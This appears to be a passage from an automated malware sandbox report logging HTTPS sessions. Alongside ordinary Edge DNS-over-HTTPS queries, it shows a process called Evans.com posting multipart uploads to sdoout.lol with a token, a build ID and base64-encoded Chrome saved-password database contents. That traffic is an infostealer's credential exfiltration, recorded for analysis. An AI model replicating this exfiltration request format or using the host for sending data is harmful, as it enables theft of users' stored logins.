                                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom$ c)


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    26192.168.2.550064172.64.41.34436308C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:32 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8fa8ffef981d4408-EWR
                                                                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0a 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    27192.168.2.550066172.64.41.34436308C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:32 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8fa8ffef7f3c191e-EWR
                                                                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:32 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 14 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom#)


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    28192.168.2.550067116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:33 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----gdtjm7gvaaaie3wbaas0
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 68733
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 67 64 74 6a 6d 37 67 76 61 61 61 69 65 33 77 62 61 61 73 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 67 64 74 6a 6d 37 67 76 61 61 61 69 65 33 77 62 61 61 73 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 67 64 74 6a 6d 37 67 76 61 61 61 69 65 33 77 62 61 61 73 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------gdtjm7gvaaaie3wbaas0Content-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------gdtjm7gvaaaie3wbaas0Content-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------gdtjm7gvaaaie3wbaas0Cont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:33 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:33 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                                                                    Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:34 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    29192.168.2.550078116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----yu3ecbi5fcbaimopzcjm
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 262605
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 79 75 33 65 63 62 69 35 66 63 62 61 69 6d 6f 70 7a 63 6a 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 79 75 33 65 63 62 69 35 66 63 62 61 69 6d 6f 70 7a 63 6a 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 79 75 33 65 63 62 69 35 66 63 62 61 69 6d 6f 70 7a 63 6a 6d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------yu3ecbi5fcbaimopzcjmContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------yu3ecbi5fcbaimopzcjmContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------yu3ecbi5fcbaimopzcjmCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
